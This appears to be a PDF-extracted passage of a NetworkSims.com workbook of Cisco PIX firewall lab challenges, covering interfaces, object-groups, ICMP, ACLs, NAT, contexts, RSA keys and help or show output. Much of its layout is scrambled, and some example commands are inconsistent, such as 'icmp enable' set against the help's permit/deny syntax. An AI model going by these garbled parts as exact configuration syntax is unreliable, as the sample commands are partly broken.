clear configure multicast-routing
DESCRIPTION:
multicast-routing
Configure multicast routing
myPIX (config)# mtu delaware 1268
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
nameif e1 falkirk security_100

ip address falkirk 192.130.14.15 255.255.252.0
interface e1 auto
mtu falkirk 1500
myPIX (config)# nameif e2 dmz security_50

myPIX (config)# ip address dmz 121.110.12.6 255.255.252.0
myPIX (config)# interface e2 auto
NetworkSims.com
494
myPIX (config)# mtu dmz 1300
Example (V 7.x)
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
# config t
# int e0
(config-if)# nameif delaware
(config-if)# security 0
(config-if)# exit
(config)# help mtu
USAGE:
mtu <if_name> <bytes> | (300-65535)
DESCRIPTION:
mtu
Specify MTU(Maximum Transmission Unit) for an interface
SYNTAX:
<if_name>
The interface name specified in the nameif command
<bytes>
The number of bytes from 300-65535 for the MTU
pixfirewall(config)# help multicast-r

USAGE:
[no] multicast-routing
clear configure multicast-routing
DESCRIPTION:
multicast-routing
Configure multicast routing
myPIX (config)# mtu delaware 1500
etc

Outline
This challenge involves the configuration of network and service objects.
Objectives
Define the name of the network object-group.

Define the description of the network object-group.
Define hosts for the network object-group.
NetworkSims.com
495
Define a network for the network object-group.

Define the name of the service object-group.
Define the description of the service object-group.
Define protocols of the TCP protocols.
Define a range of protocols for the service object-group.
Example
myPIX # config t
USAGE:
DESCRIPTION:
object-group
SYNTAX:
protocol
network
service
icmp-type
Specifies
Specifies
Specifies
Specifies
a
a
a
a
group
group
group
group
of
of
of
of

<obj_grp_id>

tcp|udp|tcp-udp

show
clear
for
TCP
UDP
via
a service group;
only, such as ftp
only, such as snmp
both TCP and UDP
see also:
myPIX (config)# object-group ?
icmp-type Specifies a group of
network
Specifies a group of
protocol
service
pixfirewall(config)# object-group

network ?
NetworkSims.com
496
WORD < 65 char
Specifies object-group ID (1-64 characters)
myPIX (config)# object-group network mississippi

myPIX(config-network)# description sales connection
myPIX(config-network)# net ?
network-object-group mode commands/options:
Hostname or A.B.C.D Enter an IPv4 network address
X:X:X:X::X/<0-128>
Enter an IPv6 prefix
host
Enter this keyword to specify a single host object
myPIX(config-network)# net host ?
Hostname or A.B.C.D
Enter a host IP address or name
Hostname or X:X:X:X::X Enter a host IPv6 address or name
myPIX(config-network)# network-object host 110.162.152.2 ?
myPIX(config-network)# network-object host 110.162.152.2
myPIX(config-network)# network-object 110.162.152.0 ?
A.B.C.D Enter an IPv4 network mask
myPIX(config-network)# network-object 110.162.152.0 255.255.0.0
myPIX (config)# object-group service ?
WORD < 65 char Specifies object-group ID (1-64 characters)
myPIX (config)# object-group service texas ?
tcp
Specifies this object-group is for TCP protocol only
tcp-udp Specifies this object-group is for both TCP & UDP
udp
Specifies this object-group is for UDP protocol only
myPIX (config)# object-group service texas tcp
myPIX(config-network)# description test connection
myPIX (config-service)# port- ?
service-object-group mode commands/options:
eq
Enter this keyword to specify a port
range Enter this keyword to specify a range of ports
myPIX (config-service)# port-object eq ?
service-object-group mode commands/options:
<0-65535>
Enter port number (0 - 65535)
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec
finger
ftp
ftp-data
NetworkSims.com
497
gopher
h323
hostname
http
https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip
smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
myPIX(config-network)#
port-object
port-object
port-object
port-object
eq telnet
eq ftp
eq www
range 1411 1422

Outline
This challenge involves enabling ICMP on interfaces, and the setup of virtual Telnet and
virtual HTTP.
Objectives
Enable ICMP on the inside interface.

Enable ICMP on the outside interface.
Enable ICMP on the DMZ interface.
NetworkSims.com
498
Example
myPIX # config t
myPIX (config)# help icmp
USAGE:
[no] icmp permit|deny <ip-address> <net-mask> [<icmp-type>] <if-name>
clear configure icmp
show running-config [all] icmp
DESCRIPTION:
icmp
Configure access for ICMP traffic that terminates at an interface
SYNTAX:
deny
permit
<ip-address>
<net-mask>
IP address
Mask to be applied to <ip-address>
<icmp-type>
echo-reply, unreachable, source-quench,

redirect, alternate-address, echo,
router-advertisement, router-solicitation, time-exceeded,
parameter-problem, timestamp-reply, timestamp-request,
information-request, information-reply, mask-request,
mask-reply, conversion-error or mobile-redirect
<if-name>
see also:
access-list, access-group
myPIX(config)# icmp permit 10.0.0.0 255.255.0.0 ?
<0-255>
Enter ICMP type number (0 - 255)
alternate-address
conversion-error
echo
echo-reply
information-reply
information-request
mask-reply
mask-request
mobile-redirect
parameter-problem
redirect
router-advertisement
router-solicitation
source-quench
time-exceeded
timestamp-reply
timestamp-request
traceroute
inf
inside
outside Name of interface Ethernet0
NetworkSims.com
499
myPIX (config)# icmp enable 10.0.0.0 255.255.0.0 inside

myPIX (config)# icmp enable 10.0.0.0 255.255.0.0 outside
myPIX (config)# icmp enable 10.0.0.0 255.255.0.0 inf2
myPIX (config)# help virtual
USAGE:
[no] virtual http <ip> [warn]
[no] virtual telnet <ip>
DESCRIPTION:
virtual
Set address for authentication virtual servers
SYNTAX:
<ip>
A public or private IP address that is not the address

of a real web server on the interface you are accessing.
Cisco recommends using an RFC 1918 address.
Let users know that the command was redirected.
The options is only applicable for text-based browsers
where the redirect cannot happen automatically.
<warn>
myPIX (config)# virtual telnet 10.1.2.3

myPIX (config)# vir http ?
Hostname or A.B.C.D A public or private IP address that is not the address
of a real web server on the interface accessed.
Cisco recommends using an RFC 1918 address.
myPIX (config)# virtual http 176.1.2.3

Outline
This challenge involves denying certain MAC addresses.
Objectives
Define a list of denied MAC addresses.
Example
myPIX # config t
myPIX (config)# help macUSAGE:
[no] mac-list <id> deny|permit <mac> <macmask>
show mac-list [id]
NetworkSims.com
500
clear mac-list [id]

DESCRIPTION:
mac-list
Add a list of mac addresses using first match search
SYNTAX:
<id>
Mac Access list number
deny
Traffic matching deny is not included in list
permit
Traffic matching permit is included in list
<mac>
Source mac address
<macmask>
myPIX (config)#
myPIX (config)#
myPIX (config)#
Mask to be
mac-list 1
mac-list 1
mac-list 1
applied to <mac>
deny 0000.1111.ffff
deny 0000.2222.ffff
deny 0000.3333.ffff

Outline
PIX Version 7.x
The new PIX image supports interface configuration mode. This challenge shows how to set
the interface parameters.
Objectives
Define the IP address and subnet mask for E0.

Define the name of the E0 interface.
Define the description of the E0 interface.
Example
# config t
myPIX (config)# hostname myPIX
myPIX (config-if)# nameif fred
NetworkSims.com
501
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX

(config-if)# description my port
(config-if)# exit
(config)# int e1
(config-if)# nameif test
(config-if)# description your port
(config-if)# exit
(config)# int e2
(config-if)# nameif market
(config-if)# description any port
(config-if)# exit

Outline
PIX Version 7.x only
The new PIX image supports a modular policy framework.
Objectives
Define class maps. Remember the class map defines the traffic which is interesting.
In this case the class-map relates to defining TCP ports and an access-list.
Apply the class maps.
Define a policy map and apply it to an interface.
Example
myPIX# config t
myPIX(config)# access-list 100 permit tcp host 165.246.68.4 host 200.194.252.5 eq
echo
myPIX(config)# class-map ?
myPIX(config)# class-map delaware
myPIX(config-cmap)# ?
myPIX(config-cmap)# description ?
myPIX(config-cmap)# description testing
myPIX(config-cmap)# match ?
myPIX(config-cmap)# match port ?
myPIX(config-cmap)# match port tcp ?
myPIX(config-cmap)# match port tcp eq ?
NetworkSims.com
502
myPIX(config-cmap)# match port tcp eq 80

myPIX(config-cmap)# match port udp eq 23
myPIX(config-cmap)# match access-list ?
myPIX(config-cmap)# match access-list 100
myPIX(config-cmap)# match dscp ?
myPIX(config-cmap)# exit
myPIX(config)# class-map VOICE
myPIX(config)# class-map EXECTEST
myPIX(config)# policy-map ?
myPIX(config)# policy-map NEW
myPIX(config-pmap)# ?
myPIX(config-pmap)# description ?
myPIX(config-pmap)# description test
myPIX(config-pmap)# class ?
myPIX(config-pmap)# class delaware
myPIX(config-pmap-c)# ?
myPIX(config-pmap-c)# inspect ?
myPIX(config-pmap-c)# ips ?
myPIX(config-pmap-c)# police ?
myPIX(config-pmap-c)# police 1000 ?
myPIX(config-pmap-c)# police 1000 500
myPIX(config-pmap-c)# set ?
myPIX(config-pmap-c)# set conn ?
myPIX(config-pmap-c)# exit
myPIX(config-pmap)# exit
myPIX(config)# service-policy ?
myPIX(config)# service-policy NEW ?
myPIX(config)# service-policy NEW interface ?
myPIX(config)# service-policy NEW interface outside
Example
An example, which has not yet been implemented in the challenge, is:
pix1(config)# class-map TEST
pix1(config-cmap)# match port tcp eq 25
pix1(config-cmap)# match tunnel-group S2S
pix1(config-cmap)# exit
pix1(config)# class-map VOICE
pix1(config-cmap)# match dscp ef
pix1(config)# class-map EXECTEST
pix1(config-cmap)# match access-list 112
pix1(config)# policy-map NEW
pix1(config-cmap)# class TEST

NetworkSims.com
503
Outline
The new PIX image supports multiple contexts.
Objectives
Define context mode.

Save context mode to a configuration file.
Define that interfaces on the same security level can communicate with each other.
Example (Ver 7.x)

pix1(config)# mode multiple
pix1(config)# context test1
pix1(config-ctx)# allocate-interface e0
pix1(config-ctx)# config-url flash:/test1.cfg
pix1(config-ctx)# exit
pix1(config)# context test2
pix1(config-ctx)# config-url flash:/test2.cfg
pix1(config-ctx)# exit
pix1(config)# same-security-traffic permit inter-interface

Outline
This is a test for some basic PIX configuration parameters ... no help is given.
NetworkSims.com
504

Outline

Outline

Outline
This challenge uses DHCP allocation.
Objectives
Define E0 details.
Define E1 details.
NetworkSims.com
505
Example (Ver 6.x)

> enable
# config t
(config)# hostname myPIX
myPIX (config)# domain-name strathclyde.int
myPIX (config)# nameif e0 moon security9
myPIX (config)# ip address moon dhcp
myPIX (config)# nameif e1 mars security100
myPIX (config)# ip address mars dhcp
myPIX (config)# nameif e2 pluto security100
myPIX (config)# ip address pluto dhcp
Example (Ver 7.x)

> enable
# config t
(config)# hostname myPIX
myPIX (config)# domain-name strathclyde.int
myPIX (config-if)# nameif moon
myPIX (config-if)# help ip
USAGE:
clear ip
DESCRIPTION:
ip
SYNTAX:
<ip_address>
<mask>
<sby_ip_addr>
<4-16>
<interface>:
<if_name>:

see also:
myPIX (config-if)# ip address dhcp
myPIX (config-if)# no shutdown
myPIX (config-if)# nameif mars
myPIX (config-if)# nameif pluto
NetworkSims.com
506


Outline
This challenge uses a static mapping with non-default names of the interfaces.
Objectives
Define E0 details.
Define E1 details.
Define a static mapping (with non-default names).
Example (Ver 7.x)

> enable
myPIX # config t
myPIX (config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# ip address 144.128.32.1 255.255.255.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 1
amsterdam (config-if)# exit
amsterdam (config-if)# nameif vermont
amsterdam (config-if)# nameif northdakota
amsterdam (config)# static (vermont,california) 144.128.32.4 81.213.27.18

Outline
NetworkSims.com
507
This challenge applies an ACL to the E0 interface.

Objectives
Define E0 details.
Define an access-list
Apply the access-list to E0.
Example (Ver 7.x)

> enable
myPIX # config t
amsterdam (config)# access-list 101 permit tcp host 132.178.215.10 host
197.161.244.7 eq ftp
amsterdam (config)# access-list 101 deny tcp 120.205.173.0 255.255.0.0
154.213.112.0 255.255.0.0 eq ftp
amsterdam (config)# access-list 101 permit tcp any any
amsterdam (config)# help access-group
USAGE:
[no]
override]
access-group
<access-list>
<in|out>
interface
<if_name>
[per-user-
DESCRIPTION:
access-group
traffic
SYNTAX:
<access-list>
<in|out>
<if_name>
per-user-override
see also:
amsterdam (config)# access-group 101 in interface california

NetworkSims.com
508
Outline
This challenge manually generates a public and private RSA key.
Objectives
Define E0 details.
Generate RSA keys.
Display public key.
Example (Ver 7.x)

> enable
myPIX # config t
amsterdam (config)# crypto key generate rsa
amsterdam (config)# show crypto key mypubkey rsa
amsterdam (config)# sh crypto key mypub rsa
Key pair was generated at: 13:28:00 UTC Jun 25 2006
Key name: <Default-RSA-Key>
Modulus Size (bits): 1024
Key Data:
30819f30 0d06092a
77632bdc 93f8872a
20f8c42f 9650eb7f
40ea6964 eaecc909
513d3100 7a25f98c
amsterdam (config)#
864886f7 0d010101
1631c8ca 24f5e102
1eddd836 090a6b94
46d61ace ffd6aa62
31bb660d 4e47587b
crypto ca ?
05000381
826acdb7
2ec34e2c
250c21d6
ace9bee9
8d003081
346dfaf2
cbca8ebe
4356610e
4e6ea81c
89028181
64770144
a3f4490a
7d2e6d61
78b6e7cd
00eff641
0dc8625e
3daee2aa
86591d35
67020301 0001

authenticate Get the CA certificate
certificate
Actions on certificates
crl
Actions on certificate revocation lists
enroll
export
Export a trustpoint configuration with all associated keys and
certificates in PKCS12 format.
import
trustpoint
amsterdam (config)# crypto ca trustpoint ?
WORD < 129 char Trustpoint Name
amsterdam (config)# crypto ca trustpoint jupiter
amsterdam (config-ca-trustpoint)# ?
crypto ca trustpoint configuration commands:
NetworkSims.com
509
accept-subordinates
crl
default
Accept subordinate CA certificates

CRL options
Return all enrollment parameters to their
default values
email
Email Address
enrollment
Enrollment parameters
exit
Exit from certificate authority trustpoint
entry mode
fqdn
include fully-qualified domain name
help
Help for crypto ca trustpoint configuration
commands
id-cert-issuer
Accept ID certificates
ip-address
include ip address
keypair
Specify the key pair whose public key is to be
certified
no
password
revocation password
serial-number
include serial number
subject-name
Subject Name
support-user-cert-validation Validate remote user certificates using the
configuration from this trust point provided
that this trust point is authenticated to the
CA that issued the remote certificate
amsterdam(config-ca-trustpoint)# enrollment url http://yourcert

Outline
This challenge defines parameters within username mode.
Objectives
Define E0, E1 and E2 names.

Define username and password.
Define username attributes.
Example (Ver 7.x)

> enable
myPIX # config t
amsterdam (config-if)# nameif texas
NetworkSims.com
510
amsterdam
amsterdam
amsterdam
amsterdam
amsterdam
amsterdam
amsterdam
(config)# int e2
(config-if)# nameif newyork
(config-if)# exit
(config)# username anne password test
(config)# username anne attrib
(config-username)# vpn-tunnel-protocol ipsec
(config-username)# vpn-simultaneous ?
username mode commands/options:

<0-2147483647> Maximum number of simultaneous logins allowed
amsterdam (config-username)# vpn-simultaneous 2

Outline
This challenge involves investigating the initial commands and on showing help.
Objectives
Investigate initial mode.

Showing help on commands.
Example
> ?
clear
enable
exit
help
login
logout
ping
quit
show
Reset functions
Exit from the EXEC
Interactive help for commands
Exit from the EXEC
Send echo messages
Exit from the EXEC
> clear ?
igmp Clear multicast membership related information
> enable ?
<0-15>
<cr>
> exit ?
Enter optional privilege level (0-15)
<cr>
> help ?
enable
exit
login
logout

Exit the current command mode
Exit from current user profile to unprivileged mode
NetworkSims.com
511
perfmon
ping
quit
> login ?
Change or view performance monitoring options

Test connectivity from specified interface to an IP address
<cr>
> logout ?
<cr>
> ping ?
Hostname or A.B.C.D
Hostname or X:X:X:X::X
<cr>
> quit ?
Ping destination IPv4 address or hostname

<cr>
> show ?
checksum
curpriv
flash:
history
version
Display
Display
Display
Display
Display
configuration information cryptochecksum

current privilege level
information about flash: file system
the session command history
system software version
> show checksum

Cryptochecksum: a0b3ec1d 272c2e58 183687ff b14a65a8
> show curpriv
Username : enable_1
Current privilege level : 1
Current Mode/s : P_UNPR
> show flash
Directory of flash:/
5
9
-rw-rw-
5103672
5919340
14:05:27 Jun 06 2006

14:10:49 Jun 06 2006
image.bin
asdm-501.bin
16128000 bytes total (5099008 bytes free)

> show history
?
clear ?
enable ?
exit ?
help ?
login ?
logout ?
ping ?
?
quit ?
show ?
show checksum
show curpriv
show flash
show history
> show version
Cisco PIX Security Appliance Software Version 7.0(1)
Device Manager Version 5.0(1)
NetworkSims.com
512
Compiled on Thu 31-Mar-05 14:37 by builders

System image file is 'flash:/image.bin'
Config file at boot was 'startup-config'
pixfirewall up 17 mins 34 secs
Hardware:
PIX-515E, 96 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff00000, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
0: Ext: Ethernet0
1: Ext: Ethernet1
2: Ext: Ethernet2
: media index
: media index
: media index
0: irq 10
1: irq 11
2: irq 11
Licensed features for this platform:

Maximum Physical Interfaces : 3
Maximum VLANs
: 10
Inside Hosts
: Unlimited
Failover
: Disabled
VPN-DES
: Enabled
VPN-3DES-AES
: Enabled
Cut-through Proxy
: Enabled
--More------ press any key --Guards
: Enabled
URL Filtering
: Enabled
Security Contexts
: 0
GTP/GPRS
: Disabled
VPN Peers
: Unlimited
This platform has a Restricted (R) license.
Serial Number: 807290112
Running Activation Key: 0x3f43a2b7 0xf5909081 0x5fd21d2b 0x16cbcc59
Configuration has not been modified since last system restart.
> enable
# help bl
USAGE:
show blocks [address <hex-address>|all|assigned|free|old|
pool <block-size> [dump|header|packet]]
[no] blocks queue history enable [buffer-size]
[clear|show] blocks queue history [detail]
DESCRIPTION:
blocks
System packet buffer (block) utilization and diagnostic

tools. By default, the maximum, lowest, and current
available counts are displayed for each block size.
SYNTAX:
address
all
assigned
free
old
pool
header
packet
dump
Shows
Shows
Shows
Shows
Shows
Shows
Shows
Shows
Shows
a block corresponding to <hex-address>

all blocks
assigned (not free) blocks
free blocks
old (retained for more than 1 minute) blocks
blocks of a specific <block-size>
only the block header
the block header and the packet data
the block header and entire block contents
NetworkSims.com
513
queue history
enable
buffer-size
detail
Diagnose packet buffer exhaustion

A small amount of memory is always allocated to this
diagnostic. This keyword allocates additional memory
for more extensive diagnostics when needed.
By default, the amount of memory is determined by the
system. Use 'no' to return this memory back to the
system.
Number of memory bytes to allocate for diagnostics
Display a portion of packet buffer contents
# help bo
USAGE:
[no] boot system | config <url>
clear configure boot [system | config]
DESCRIPTION:
boot
Configure the system image and startup-config file used to boot

the system
SYNTAX:
system <url>
Configure a url pointing to the system image file that will

be run on reload. Multiple system urls can be configured, the
first one found will be loaded.
config <url>
Configure a url pointing to the startup-config that will be
used to configure the system on reload. Only one url can be
set, multiple invocations of this command will overwrite the
previous setting.
When you use these commands, you affect only the running configuration.
You must save the environment variable setting to your startup configuration
to place the information under ROM monitor control and to have the
environment variable function as expected. Use the write mem or
copy running-config startup-config commands to save the environment variable
from your running configuration to your startup configuration and place them
under ROM monitor control.
# sh process
Lwe
Mrd
Mwe
Mwe
Lwe
Msi
Mrd
Msi
Mwe
Msi
Lsi
Mwe
Mwe
Mwe
Lwe
Mwe
Mwe
Mwe
Mwe
Mwe
PC
00105689
001dba60
00112cf5
00116edf
001db106
003cda1f
003cd97a
003cd9cb
00b6e13d
006f6c3e
00a4d60d
006e73bd
008ce47d
0074ff85
00b89581
00908601
009eba89
009e7911
009d8925
009d9d31
SP
00ffbe90
011c63d0
0120bec0
0120e410
012168c0
0121ab00
0121cc20
0121ed40
0122f5e0
01238cb8
0123adf8
012481b8
0124dd80
0124fed8
012527b0
01258b00
012636b8
01267910
01269a40
0126bb80
NetworkSims.com
STATE
00db4a10
00db4a78
00db49c8
00db5ff8
00dbe540
00db49c8
00db4a78
00db49c8
00db49c8
00db49c8
00db49c8
00d3a280
00d441f0
00d3af64
00db49c8
00db49c8
016dda58
00d5ad60
00d5a730
00db49c8
Runtime
0
593450
0
0
0
0
1270490
0
0
0
0
0
0
0
7780
0
0
0
0
0
SBASE
00ff9f08
011c2478
01209f48
0120c4c8
01214948
01218b88
0121aca8
0121cdc8
0122d658
01236d50
01238e70
01246240
0124be08
0124df60
01250838
01256b98
0125f7d0
012659c8
01267ae8
01269c08
Stack Process
8072/8192 block_diag
16044/16384 Dispatch Unit
7772/8192 Reload Control Thread
8008/8192 aaa
7308/8192 dbgtrace
7840/8192 557mcfix
7660/8192 557poll
7776/8192 557statspoll
7788/8192 Chunk Manager
7684/8192 PIX Garbage Collector
7428/8192 route_process
8056/8192 IP Address Assign
8056/8192 QoS Support Module
8056/8192 Client Update Task
7740/8192 Checkheaps
7276/8192 Session Manager
15636/16384 uauth
7660/8192 SMTP
7276/8192 Logger
7292/8192 Thread Logger
514
Mwe 00ac127b
Msi 00487913
Mwe 004907b1
Mwe 009edfa9
Mwe 009ededd
Mwe 009f893b
Mrd 005e39c6
Mwe 00166f31
Mwe 0017c064
Msi 00189b71
Mwe 00a78685
Mwe 00a78475
Mwe 00a637df
Msi 00ac1b7a
Mwe 00691e95
Mwe 001d48dd
thread
Mwe 0081bbd9
Mwe 008212d4
Lsi 0070b0a9
Lsi 006f1020
Mwe 0041eb69
Mwe 004117a9
Mwe 009add91
Daemon
Mwe 009838b4
Mwe 009af891
Keeper
M* 001e41e7
Csi 007260e9
Msi 007268bd
Mwe 00a9ead8
Msi 00aaa63b
Mwe 00aa70f7
Msi 00aa9f28
01278230 00d85390
0131e2a8 00db49c8
013231d8 00dcca70
0133e988 00d5b770
013409a0 00d5b770
01350d90 00d5b8f0
0122b330 00db4a78
01225ea8 00db49c8
01631c38 01228490
01633c60 00db49c8
01635c78 00db49c8
01637cb0 00db49c8
0166fdb8 00d80128
01671dc0 00db49c8
016864c8 00db49c8
016cf518 00d11ef0
0170df38
01710038
01212690
01771498
01773808
01778ba8
0177bb80
00db49c8
00db49c8
00db49c8
00db49c8
00db49c8
00d2c9c0
00d5a0f8
0177db30 017b5b68
0177fdd0 00db49c8
0009feec
017aaa60
017b0c48
017bd5e0
017bf608
017c1630
017c3760
00db4a78
00db49c8
00db49c8
00d8457c
00db49c8
00d84688
00db49c8
0
0
0
0
0
0
813010
0
0
0
0
0
0
0
0
012762c8 6956/8192 vpnlb_thread

0131c330 7324/8192 arp_timer
01321270 7964/8192 arp_forward_thread
0133ca20 7824/8192 tcp_fast
0133ea48 7808/8192 tcp_slow
0134ee28 8040/8192 udp_timer
01229418 7788/8192 snp_timer_thread
01223f20 7976/8192 CTCP Timer process
0162fcd0 7700/8192 IPsec message handler
01631cf8 7720/8192 CTM message handler
01633d20 7928/8192 L2TP data daemon
01635d48 7944/8192 L2TP mgmt daemon
0166be50 16184/16384 ppp_timer_thread
0166fe78 7792/8192 vpnlb_timer_thread
01682560 16048/16384 IP Background
10 016af5c0 126852/131072 tmatch compile
0
0
0
0
0
0
01709fb0 15980/16384 Crypto PKI RECV

0170e0d0 7772/8192 Crypto CA
01210708 7856/8192 uauth_urlb clean
0176f520 7840/8192 perfmon
01771890 7960/8192 IKE Timekeeper
01774f50 15404/16384 IKE Daemon
0 01779c08 8056/8192 RADIUS Proxy Event
0 0177bd28 7260/8192 RADIUS Proxy Listener

0 0177de48 7976/8192 RADIUS Proxy Time
1730
0
0
0
0
0
0
017a49d8
017a8af8
017aed70
017bb688
017bd6b0
017bf6d8
017c17f8
4844/16384 ci/console
7340/8192 update_cpu_usage
7364/8192 NIC status poll
8024/8192 vpnfo_thread_msg
7808/8192 vpnfo_thread_timer
8024/8192 vpnfo_thread_sync
7824/8192 vpnfo_thread_unsent
# sh startup
: Saved
: Written by enable_15 at 15:48:15.415 UTC Thu Dec 28 2006
PIX Version 7.0(1)
names
!
interface Ethernet0
shutdown
no nameif
no security-level
no ip address
!
interface Ethernet1
shutdown
no nameif
no security-level
no ip address
!
interface Ethernet2
shutdown
no nameif
no security-level
no ip address
!
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
NetworkSims.com
515
hostname pixfirewall
ftp mode passive
pager lines 2
no asdm history enable
arp timeout 14400
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00
timeout mgcp-pat 0:05:00 sip 0:30:00 sip_media 0:02:00
timeout uauth 0:05:00 absolute
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp
telnet timeout 5
ssh timeout 5
console timeout 0
!
class-map inspection_default
match default-inspection-traffic
!
!
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
inspect sip
inspect netbios
inspect tftp
!
Cryptochecksum:a0b3ec1d272c2e58183687ffb14a65a8
# a?
# b?
# c?

Outline
This challenge involves investigating the initial commands and on showing help.
Objectives
Investigate initial mode.
NetworkSims.com
516
Showing help on commands.
Example
pixfirewall# help ?
activation-key
arp
blocks
boot
Modify activation-key
Show ARP cache or clear ARP cache or statistics
System packet buffer utilization
Configure the system image and startup-config file to boot
the system
capture
Capture inbound and outbound packets on one or more
interfaces
cd
Change the working directory
configure
Configure from terminal
copy
Copy files from and to, disk or flash or TFTP server or HTTP
server
crashinfo
Configure, test and view crash information collection
debug
Debug packets or ICMP tracings through the system
delete
Delete a file
dir
Display the directory contents
disable
Exit from privileged mode
downgrade
Downgrade the file system and reboot
erase
Erase and format filesystem
exit
format
Format filesystem
fsck
File system check
kill
Terminate a telnet session
logging
Configure, show, clear logging command options or operational
data
logout
memory
System memory utilization
mkdir
Create new directory
more
Display a file's contents
ospf
Display or clear OSPF information
perfmon
Change or view performance monitoring options
ping
pwd
Display the current directory
quit
reload
Halt and reload system
rename
Rename a file
resource
Display or clear resource usage
rmdir
Remove existing directory
shun
Manages the filtering of packets from undesired hosts
terminal
Turn on/off syslogging or set pagers for the terminal
traffic
Counters for traffic statistics
undebug
Undebug packets or ICMP tracings through the system
who
Show active administration sessions
write
Write config to net, flash, or terminal, or erase flash
pixfirewall# help act
USAGE:
show activation-key
DESCRIPTION:
activation-key
SYNTAX:
NetworkSims.com
517
pixfirewall# help arp
Unrecognized command: arp
At the end of show <command>, use the pipe character '|' followed by:
begin|include|exclude|grep [-v] <regular_exp>, to filter show output.
activation-key
boot
blocks
capture
configure
copy
Crashinfo
debug
disable
firewall
kill
logout
logging
memory
mode
more
ospf
perfmon
ping
priority-queue
quit
reload
resource
session
hw-module
Perform
shun
terminal
downgrade
the system
Capture inbound and outbound packets on one or more interfaces
Copy files from and to, disk or flash or TFTP server or HTTP server
Read, write and configure crash write to flash. Force a crash.
Enable debugging functions
Switch to router/transparent mode.
Configure, show or clear logging command options or
operational data
System memory utilization and diagnostic tools
Toggle between single and multiple security context mode
Show or clear OSPF information
Display perfmon stats or change options
Configure a priority queue object
Disable, end configuration or logout
Display system resource allocation and usage
Open a command session to another module
operations on an installed hardware module

Set and reset terminal monitor or pagination
Downgrade the system image. Unit will reboot with execution
of this command.
traffic
who
Show active administration sessions on the device
write
Write config to net, flash, or terminal, or erase flash.
Write without argument defaults to write memory
cd
delete
Delete a file
dir
erase
format
Format filesystem
more
pwd
mkdir
rename
Rename a file
rmdir
fsck
Perform file system check
pixfirewall# help bl
USAGE:
show blocks [address <hex-address>|all|assigned|free|old|
pool <block-size> [dump|header|packet]]
NetworkSims.com
518
[no] blocks queue history enable [buffer-size]

[clear|show] blocks queue history [detail]
DESCRIPTION:
blocks

SYNTAX:
address
all
assigned
free
old
pool
header
packet
dump
Shows
Shows
Shows
Shows
Shows
Shows
Shows
Shows
Shows
a block corresponding to <hex-address>

all blocks
assigned (not free) blocks
free blocks
old (retained for more than 1 minute) blocks
blocks of a specific <block-size>
only the block header
the block header and the packet data
the block header and entire block contents
queue history
enable
buffer-size
detail
Diagnose packet buffer exhaustion

A small amount of memory is always allocated to this
diagnostic. This keyword allocates additional memory
for more extensive diagnostics when needed.
By default, the amount of memory is determined by the
system. Use 'no' to return this memory back to the
system.
Number of memory bytes to allocate for diagnostics
Display a portion of packet buffer contents
pixfirewall# help bo
USAGE:
[no] boot system | config <url>
clear configure boot [system | config]
DESCRIPTION:
boot

the system
SYNTAX:
system <url>
Configure a url pointing to the system image file that will

be run on reload. Multiple system urls can be configured, the
first one found will be loaded.
config <url>
Configure a url pointing to the startup-config that will be
used to configure the system on reload. Only one url can be
set, multiple invocations of this command will overwrite the
previous setting.
When you use these commands, you affect only the running configuration.
You must save the environment variable setting to your startup configuration
to place the information under ROM monitor control and to have the
environment variable function as expected. Use the write mem or
copy running-config startup-config commands to save the environment variable
from your running configuration to your startup configuration and place them
under ROM monitor control.
pixfirewall#
help cap
NetworkSims.com
519
USAGE:
capture <capture-name> [type raw-data] [type asp-drop <drop-code>]
[type isakmp]
[access-list <acl-name>] [buffer <buf-size>]
[ethernet-type <type>] [interface <if-name>]
[packet-length <bytes>]
[circular-buffer]
clear capture <capture-name>
no capture <capture-name> [type raw-data][type asp-drop <drop-code>]
[type isakmp]
[access-list <acl_name>] [circular-buffer] [interface <if-name>]
show capture [[context-name/]<capture-name> [access-list <acl-name>]
[count <number>] [detail] [dump][decode][packet-number <number>]]
DESCRIPTION:
capture
Capture inbound and outbound packets on one or more interfaces
SYNTAX:
<capture-name>
<context-name>
<acl-name>
<buf-size>
<type>
name of
name of
capture
size of
capture
capture
the context
IP packets that match access-list <acl-name>
capture buffer in bytes, range <84-33554432>
Ethernet packets of <type>, valid types are
ip, arp, rarp, ipx, ip6, ppoed, pppoes and <0-65535>
<if-name>
- the physical interface to listen
<bytes>
- maximum length to save from each packet
circular-buffer - overwrite buffer from beginning when full
count
- display <number> of packets in capture
detail
- display more information for each packet
dump
- display the hex dump for each packet
see also: copy
pixfirewall# help cd
USAGE:
cd [{disk0:|disk1:|flash:}][<path>]
DESCRIPTION:
cd
SYNTAX:
{disk0:|disk1:|flash:} Optional parameter that specifies the filesystem
<path>
Directory name
pixfirewall# help conf
USAGE:
configure terminal
DESCRIPTION:
configure
SYNTAX:
see also:
the configure options in configure mode
NetworkSims.com
520
pixfirewall# help copy

USAGE:
copy
copy
copy
copy
[/<options>]
[/<options>]
[/<options>]
[/<options>]
capture:[<context-name>/]<buffer name> <URL>

[<local>:]<file spec> [<local>:]<file spec>
[<local>:]<file spec> <URL>
<URL>
